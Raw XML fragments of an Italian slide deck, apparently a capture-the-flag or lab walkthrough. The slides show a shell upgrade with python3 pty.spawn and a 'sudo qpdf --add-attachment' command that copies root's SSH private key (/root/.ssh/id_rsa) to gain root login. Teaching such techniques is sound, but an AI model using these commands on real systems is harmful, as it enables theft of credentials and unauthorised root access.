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1" r:id="rId16"/>
    <p:sldId id="270" r:id="rId17"/>
    <p:sldId id="269" r:id="rId18"/>
    <p:sldId id="273" r:id="rId19"/>
    <p:sldId id="274" r:id="rId20"/>
    <p:sldId id="275" r:id="rId21"/>
    <p:sldId id="276" r:id="rId22"/>
    <p:sldId id="281" r:id="rId23"/>
    <p:sldId id="278" r:id="rId24"/>
    <p:sldId id="282" r:id="rId25"/>
    <p:sldId id="283" r:id="rId26"/>
    <p:sldId id="284" r:id="rId27"/>
    <p:sldId id="285" r:id="rId28"/>
    <p:sldId id="286" r:id="rId29"/>
    <p:sldId id="288" r:id="rId30"/>
    <p:sldId id="289" r:id="rId31"/>
    <p:sldId id="291" r:id="rId32"/>
    <p:sldId id="292" r:id="rId33"/>
    <p:sldId id="290" r:id="rId34"/>
    <p:sldId id="287" r:id="rId35"/>
    <p:sldId id="296" r:id="rId36"/>
    <p:sldId id="297" r:id="rId37"/>
    <p:sldId id="298" r:id="rId38"/>
    <p:sldId id="329" r:id="rId39"/>
    <p:sldId id="299" r:id="rId40"/>
    <p:sldId id="300" r:id="rId41"/>
    <p:sldId id="301" r:id="rId42"/>
    <p:sldId id="302" r:id="rId43"/>
    <p:sldId id="303" r:id="rId44"/>
    <p:sldId id="304" r:id="rId45"/>
    <p:sldId id="305" r:id="rId46"/>
    <p:sldId id="311" r:id="rId47"/>
    <p:sldId id="312" r:id="rId48"/>
    <p:sldId id="306" r:id="rId49"/>
    <p:sldId id="310" r:id="rId50"/>
    <p:sldId id="308" r:id="rId51"/>
    <p:sldId id="313" r:id="rId52"/>
    <p:sldId id="314" r:id="rId53"/>
    <p:sldId id="315" r:id="rId54"/>
    <p:sldId id="309" r:id="rId55"/>
    <p:sldId id="316" r:id="rId56"/>
    <p:sldId id="317" r:id="rId57"/>
    <p:sldId id="318" r:id="rId58"/>
    <p:sldId id="319" r:id="rId59"/>
    <p:sldId id="320" r:id="rId60"/>
    <p:sldId id="321" r:id="rId61"/>
    <p:sldId id="322" r:id="rId62"/>
    <p:sldId id="323" r:id="rId63"/>
    <p:sldId id="324" r:id="rId64"/>
    <p:sldId id="325" r:id="rId65"/>
    <p:sldId id="326" r:id="rId66"/>
    <p:sldId id="328" r:id="rId6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70B3D-E914-07A1-8ECB-AD991F7EA30E}" v="1044" dt="2024-06-06T14:03:25.503"/>
    <p1510:client id="{5FDAE310-EFC6-A948-B3CE-6DF5F0637185}" v="222" dt="2024-06-06T15:11:31.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77977-E2E1-4CD2-9259-625DB54131A7}"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5346FF6A-E90B-4C47-8DE5-83221260D4C5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="it-IT"/>
            <a:t>Ora siamo entrati come utente “www-data”.  </a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DA748039-BEC6-40C4-840A-B68646A114A4}" type="parTrans" cxnId="{F31510FA-352B-495C-B423-6D51A8D964A0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7C1BC4F1-1F6B-4F2C-BE37-47F304DE1BB4}" type="sibTrans" cxnId="{F31510FA-352B-495C-B423-6D51A8D964A0}">
      <dgm:prSet phldrT="01" phldr="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>01</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ADB0EEA4-1C74-4812-877B-955F21E6DB5B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="it-IT"/>
            <a:t>Per renderci la vita più agiata possiamo utilizzare il seguente comando per passare da sh a bash: </a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{20C73D95-2370-4624-AE0E-48F8FE79298A}" type="parTrans" cxnId="{12FB74CA-A3B7-4358-B41C-5A50B433995B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{95133227-8985-496B-8F51-F463883973AC}" type="sibTrans" cxnId="{12FB74CA-A3B7-4358-B41C-5A50B433995B}">
      <dgm:prSet phldrT="02" phldr="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>02</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5D87FB79-75BA-4094-8163-4BE9CAF56159}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="it-IT"/>
            <a:t>python3 -c 'import pty; pty.spawn("/bin/bash")' </a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E1B6AA5C-018B-4FA5-B709-FCDEBA2969F2}" type="parTrans" cxnId="{42E66BCF-5514-42F4-806F-99F711F2AAE3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AF919124-5AA5-4803-9B4F-80AA74332909}" type="sibTrans" cxnId="{42E66BCF-5514-42F4-806F-99F711F2AAE3}">
      <dgm:prSet phldrT="03" phldr="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>03</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D252F0B2-C876-4380-95C4-0541956F4D5B}" type="pres">
      <dgm:prSet presAssocID="{06877977-E2E1-4CD2-9259-625DB54131A7}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2989E574-DCD1-4E49-BA6E-B009BFDAD3EE}" type="pres">
      <dgm:prSet presAssocID="{5346FF6A-E90B-4C47-8DE5-83221260D4C5}" presName="compositeNode" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0D7F6743-31BB-4B81-B9D9-443F7A7C98AB}" type="pres">
      <dgm:prSet presAssocID="{5346FF6A-E90B-4C47-8DE5-83221260D4C5}" presName="bgRect" presStyleLbl="alignNode1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DB2FAAEB-A4BE-4A8D-BDB9-78C9EEBE966E}" type="pres">
      <dgm:prSet presAssocID="{7C1BC4F1-1F6B-4F2C-BE37-47F304DE1BB4}" presName="sibTransNodeRect" presStyleLbl="alignNode1" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3DFB62AB-3CF0-4B5F-8244-2D36BA5C8B46}" type="pres">
      <dgm:prSet presAssocID="{5346FF6A-E90B-4C47-8DE5-83221260D4C5}" presName="nodeRect" presStyleLbl="alignNode1" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F2B0B09C-910B-4DEC-838F-6C65A6DD00B0}" type="pres">
      <dgm:prSet presAssocID="{7C1BC4F1-1F6B-4F2C-BE37-47F304DE1BB4}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B21F7335-9AD7-49B0-966E-8B40776F3B56}" type="pres">
      <dgm:prSet presAssocID="{ADB0EEA4-1C74-4812-877B-955F21E6DB5B}" presName="compositeNode" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{392A494B-2E8F-4BE1-A8F7-B05CD0EE9333}" type="pres">
      <dgm:prSet presAssocID="{ADB0EEA4-1C74-4812-877B-955F21E6DB5B}" presName="bgRect" presStyleLbl="alignNode1" presStyleIdx="1" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5CD54ABE-C593-4B99-ADF4-D0ED154A7D3B}" type="pres">
      <dgm:prSet presAssocID="{95133227-8985-496B-8F51-F463883973AC}" presName="sibTransNodeRect" presStyleLbl="alignNode1" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{56CEDAED-1447-4DF6-B09A-01839CB9D0DD}" type="pres">
      <dgm:prSet presAssocID="{ADB0EEA4-1C74-4812-877B-955F21E6DB5B}" presName="nodeRect" presStyleLbl="alignNode1" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7E6F661F-8EEE-4737-B14D-71BF183EE2F4}" type="pres">
      <dgm:prSet presAssocID="{95133227-8985-496B-8F51-F463883973AC}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C10AE615-187C-47EB-8D4D-DDE40B9826B9}" type="pres">
      <dgm:prSet presAssocID="{5D87FB79-75BA-4094-8163-4BE9CAF56159}" presName="compositeNode" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F535595C-62D5-4872-B690-EAF1D8EA7CE7}" type="pres">
      <dgm:prSet presAssocID="{5D87FB79-75BA-4094-8163-4BE9CAF56159}" presName="bgRect" presStyleLbl="alignNode1" presStyleIdx="2" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{43997D5B-B9A0-4DCE-A3FB-C29D686F1B51}" type="pres">
      <dgm:prSet presAssocID="{AF919124-5AA5-4803-9B4F-80AA74332909}" presName="sibTransNodeRect" presStyleLbl="alignNode1" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{AD26C9E2-4F33-43C3-90BE-3FCED5510950}" type="pres">
      <dgm:prSet presAssocID="{5D87FB79-75BA-4094-8163-4BE9CAF56159}" presName="nodeRect" presStyleLbl="alignNode1" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{EBF0531D-2AF4-485B-AA13-6B20721E89BF}" type="presOf" srcId="{ADB0EEA4-1C74-4812-877B-955F21E6DB5B}" destId="{56CEDAED-1447-4DF6-B09A-01839CB9D0DD}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/LinearBlockProcessNumbered"/>
    <dgm:cxn modelId="{961A421F-62A1-4835-8332-A23C29ECB794}" type="presOf" srcId="{ADB0EEA4-1C74-4812-877B-955F21E6DB5B}" destId="{392A494B-2E8F-4BE1-A8F7-B05CD0EE9333}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/LinearBlockProcessNumbered"/>
    <dgm:cxn modelId="{45829F6E-BF43-44FA-8F69-F0E6411DC874}" type="presOf" srcId="{5346FF6A-E90B-4C47-8DE5-83221260D4C5}" destId="{3DFB62AB-3CF0-4B5F-8244-2D36BA5C8B46}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/LinearBlockProcessNumbered"/>
    <dgm:cxn modelId="{FE2DAE70-6AE9-498B-B7C0-8C4E3F38C724}" type="presOf" srcId="{7C1BC4F1-1F6B-4F2C-BE37-47F304DE1BB4}" destId="{DB2FAAEB-A4BE-4A8D-BDB9-78C9EEBE966E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/LinearBlockProcessNumbered"/>
    <dgm:cxn modelId="{4FED0572-FAC6-40D1-9752-26E6C9652080}" type="presOf" srcId="{06877977-E2E1-4CD2-9259-625DB54131A7}" destId="{D252F0B2-C876-4380-95C4-0541956F4D5B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/LinearBlockProcessNumbered"/>
    <dgm:cxn modelId="{D5464555-6F5B-43D3-A42E-7036F95EEDB2}" type="presOf" srcId="{AF919124-5AA5-4803-9B4F-80AA74332909}" destId="{43997D5B-B9A0-4DCE-A3FB-C29D686F1B51}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/LinearBlockProcessNumbered"/>
    <dgm:cxn modelId="{D3124A88-8FC6-4346-9F8A-B7DD277F4788}" type="presOf" srcId="{5D87FB79-75BA-4094-8163-4BE9CAF56159}" destId="{F535595C-62D5-4872-B690-EAF1D8EA7CE7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/LinearBlockProcessNumbered"/>
    <dgm:cxn modelId="{0F34D9C9-A804-48DA-8FAD-C4AF566B1686}" type="presOf" srcId="{5346FF6A-E90B-4C47-8DE5-83221260D4C5}" destId="{0D7F6743-31BB-4B81-B9D9-443F7A7C98AB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/LinearBlockProcessNumbered"/>
    <dgm:cxn modelId="{12FB74CA-A3B7-4358-B41C-5A50B433995B}" srcId="{06877977-E2E1-4CD2-9259-625DB54131A7}" destId="{ADB0EEA4-1C74-4812-877B-955F21E6DB5B}" srcOrd="1" destOrd="0" parTransId="{20C73D95-2370-4624-AE0E-48F8FE79298A}" sibTransId="{95133227-8985-496B-8F51-F463883973AC}"/>
    <dgm:cxn modelId="{42E66BCF-5514-42F4-806F-99F711F2AAE3}" srcId="{06877977-E2E1-4CD2-9259-625DB54131A7}" destId="{5D87FB79-75BA-4094-8163-4BE9CAF56159}" srcOrd="2" destOrd="0" parTransId="{E1B6AA5C-018B-4FA5-B709-FCDEBA2969F2}" sibTransId="{AF919124-5AA5-4803-9B4F-80AA74332909}"/>
    <dgm:cxn modelId="{8142A5F4-F28C-46AD-AD97-15D8CC7A62EC}" type="presOf" srcId="{95133227-8985-496B-8F51-F463883973AC}" destId="{5CD54ABE-C593-4B99-ADF4-D0ED154A7D3B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/LinearBlockProcessNumbered"/>
    <dgm:cxn modelId="{EB0114F8-F969-49D6-9AD6-D80E83E79BA6}" type="presOf" srcId="{5D87FB79-75BA-4094-8163-4BE9CAF56159}" destId="{AD26C9E2-4F33-43C3-90BE-3FCED5510950}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/LinearBlockProcessNumbered"/>
    <dgm:cxn modelId="{F31510FA-352B-495C-B423-6D51A8D964A0}" srcId="{06877977-E2E1-4CD2-9259-625DB54131A7}" destId="{5346FF6A-E90B-4C47-8DE5-83221260D4C5}" srcOrd="0" destOrd="0" parTransId="{DA748039-BEC6-40C4-840A-B68646A114A4}" sibTransId="{7C1BC4F1-1F6B-4F2C-BE37-47F304DE1BB4}"/>
    <dgm:cxn modelId="{E12528CD-CAE2-4E66-9F7B-C6A5B11ADFB7}" type="presParOf" srcId="{D252F0B2-C876-4380-95C4-0541956F4D5B}" destId="{2989E574-DCD1-4E49-BA6E-B009BFDAD3EE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/LinearBlockProcessNumbered"/>
    <dgm:cxn modelId="{7889AF83-26F5-4B42-8DCE-192E19943E50}" type="presParOf" srcId="{2989E574-DCD1-4E49-BA6E-B009BFDAD3EE}" destId="{0D7F6743-31BB-4B81-B9D9-443F7A7C98AB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/LinearBlockProcessNumbered"/>
    <dgm:cxn modelId="{AD906F50-EAEB-48F9-A34B-86D216EC2CE7}" type="presParOf" srcId="{2989E574-DCD1-4E49-BA6E-B009BFDAD3EE}" destId="{DB2FAAEB-A4BE-4A8D-BDB9-78C9EEBE966E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/LinearBlockProcessNumbered"/>
    <dgm:cxn modelId="{385A7088-88A1-4014-8F15-F786A1C12E93}" type="presParOf" srcId="{2989E574-DCD1-4E49-BA6E-B009BFDAD3EE}" destId="{3DFB62AB-3CF0-4B5F-8244-2D36BA5C8B46}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/LinearBlockProcessNumbered"/>
    <dgm:cxn modelId="{4A2F53A8-D45F-4EC3-AB63-0A60A440711F}" type="presParOf" srcId="{D252F0B2-C876-4380-95C4-0541956F4D5B}" destId="{F2B0B09C-910B-4DEC-838F-6C65A6DD00B0}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/LinearBlockProcessNumbered"/>
    <dgm:cxn modelId="{A99F71AD-5289-4E9F-83EC-83205817DD6B}" type="presParOf" srcId="{D252F0B2-C876-4380-95C4-0541956F4D5B}" destId="{B21F7335-9AD7-49B0-966E-8B40776F3B56}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/LinearBlockProcessNumbered"/>
    <dgm:cxn modelId="{42C79CB8-620E-43F7-ACD2-99DF270FF106}" type="presParOf" srcId="{B21F7335-9AD7-49B0-966E-8B40776F3B56}" destId="{392A494B-2E8F-4BE1-A8F7-B05CD0EE9333}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/LinearBlockProcessNumbered"/>
    <dgm:cxn modelId="{D93B0A16-9CFC-4798-95C2-C6B9C19AD67F}" type="presParOf" srcId="{B21F7335-9AD7-49B0-966E-8B40776F3B56}" destId="{5CD54ABE-C593-4B99-ADF4-D0ED154A7D3B}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/LinearBlockProcessNumbered"/>
    <dgm:cxn modelId="{0B73EF21-23F5-4392-A6D5-551E0C81E2FC}" type="presParOf" srcId="{B21F7335-9AD7-49B0-966E-8B40776F3B56}" destId="{56CEDAED-1447-4DF6-B09A-01839CB9D0DD}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/LinearBlockProcessNumbered"/>
    <dgm:cxn modelId="{455FCDCE-955F-4E7C-A233-145F08A2CD29}" type="presParOf" srcId="{D252F0B2-C876-4380-95C4-0541956F4D5B}" destId="{7E6F661F-8EEE-4737-B14D-71BF183EE2F4}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/LinearBlockProcessNumbered"/>
    <dgm:cxn modelId="{01FDC09D-41DA-4546-A938-804A6BF03645}" type="presParOf" srcId="{D252F0B2-C876-4380-95C4-0541956F4D5B}" destId="{C10AE615-187C-47EB-8D4D-DDE40B9826B9}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/LinearBlockProcessNumbered"/>
    <dgm:cxn modelId="{ED4EC25D-F8C9-4EF5-90D4-B6D4CD2BCF4E}" type="presParOf" srcId="{C10AE615-187C-47EB-8D4D-DDE40B9826B9}" destId="{F535595C-62D5-4872-B690-EAF1D8EA7CE7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/LinearBlockProcessNumbered"/>
    <dgm:cxn modelId="{52699947-0A26-43D4-9DAA-496656924075}" type="presParOf" srcId="{C10AE615-187C-47EB-8D4D-DDE40B9826B9}" destId="{43997D5B-B9A0-4DCE-A3FB-C29D686F1B51}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2016/7/layout/LinearBlockProcessNumbered"/>
    <dgm:cxn modelId="{9F322494-2B18-4398-92C9-25EA418248CB}" type="presParOf" srcId="{C10AE615-187C-47EB-8D4D-DDE40B9826B9}" destId="{AD26C9E2-4F33-43C3-90BE-3FCED551095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C7515-BB4C-4606-B67C-600F4DCA4AE2}"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87D2EC3B-5DA6-4094-B2B4-210292F36A5D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="it-IT"/>
            <a:t>Il comando qpdf è il seguente: </a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DE77E2DD-A83B-495E-B9B1-82B3564718EA}" type="parTrans" cxnId="{76E3426E-B976-4FD5-8C0D-AB2AA85C4844}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B48856CA-3723-4074-8FBD-9392545D8410}" type="sibTrans" cxnId="{76E3426E-B976-4FD5-8C0D-AB2AA85C4844}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{04B90381-F658-435D-80EE-2F4718D07F7D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="it-IT"/>
            <a:t>sudo /usr/bin/qpdf --empty /tmp/rsa.txt --qdf --add-attachment /root/.ssh/id_rsa -- </a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B6EB2663-26A5-47B4-8F04-7D8CA12CD8A9}" type="parTrans" cxnId="{3FA37803-21F2-4EA5-BB14-24AB9C9B4F2D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9D9248CC-CDFD-43DB-B44F-E2F1B4060938}" type="sibTrans" cxnId="{3FA37803-21F2-4EA5-BB14-24AB9C9B4F2D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{29B8AAE2-736C-4391-8EFD-072326A630B4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="it-IT"/>
            <a:t>In quanto consuela, creata la copia del file /root/.ssh/id_rsa non ci resta altro che stamparlo a schermo, usarlo e connetterci alla macchina target come utenri root. </a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A1E3B11E-E699-4837-B848-5B695295F1B3}" type="parTrans" cxnId="{4E8E6C39-814C-42D5-BC46-08CF62B54245}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9310BD89-3CFF-4380-A577-C134BF381DCD}" type="sibTrans" cxnId="{4E8E6C39-814C-42D5-BC46-08CF62B54245}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D66D2CC0-A6D7-42F9-82EA-60A058765703}" type="pres">
      <dgm:prSet presAssocID="{0B6C7515-BB4C-4606-B67C-600F4DCA4AE2}" presName="outerComposite" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:chMax val="5"/>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{30ECD8EB-7CB3-45DD-B3D3-3B3F6F037AA8}" type="pres">
      <dgm:prSet presAssocID="{0B6C7515-BB4C-4606-B67C-600F4DCA4AE2}" presName="dummyMaxCanvas" presStyleCnt="0">
        <dgm:presLayoutVars/>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F79871BE-CA8F-46A8-8A44-5862028ED8D3}" type="pres">
      <dgm:prSet presAssocID="{0B6C7515-BB4C-4606-B67C-600F4DCA4AE2}" presName="ThreeNodes_1" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{05957E71-A88E-4CE6-B370-6C64F1C2BFAA}" type="pres">
      <dgm:prSet presAssocID="{0B6C7515-BB4C-4606-B67C-600F4DCA4AE2}" presName="ThreeNodes_2" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{718CA4E2-B800-49CB-BA55-C039ED1A4979}" type="pres">
      <dgm:prSet presAssocID="{0B6C7515-BB4C-4606-B67C-600F4DCA4AE2}" presName="ThreeNodes_3" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CD93190D-0C23-4013-AE13-1195EE43B3E9}" type="pres">
      <dgm:prSet presAssocID="{0B6C7515-BB4C-4606-B67C-600F4DCA4AE2}" presName="ThreeConn_1-2" presStyleLbl="fgAccFollowNode1" presStyleIdx="0" presStyleCnt="2">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{34ECCA4E-7730-4A92-B775-6B5F749E619A}" type="pres">
      <dgm:prSet presAssocID="{0B6C7515-BB4C-4606-B67C-600F4DCA4AE2}" presName="ThreeConn_2-3" presStyleLbl="fgAccFollowNode1" presStyleIdx="1" presStyleCnt="2">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B1CC3612-0E17-4A18-A5FF-0B57F2C11F08}" type="pres">
      <dgm:prSet presAssocID="{0B6C7515-BB4C-4606-B67C-600F4DCA4AE2}" presName="ThreeNodes_1_text" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5380FF30-BF3A-468A-AF95-7085180E8FFC}" type="pres">
      <dgm:prSet presAssocID="{0B6C7515-BB4C-4606-B67C-600F4DCA4AE2}" presName="ThreeNodes_2_text" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3FBEEB7D-BB87-4604-B197-5B91C8B39AD8}" type="pres">
      <dgm:prSet presAssocID="{0B6C7515-BB4C-4606-B67C-600F4DCA4AE2}" presName="ThreeNodes_3_text" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
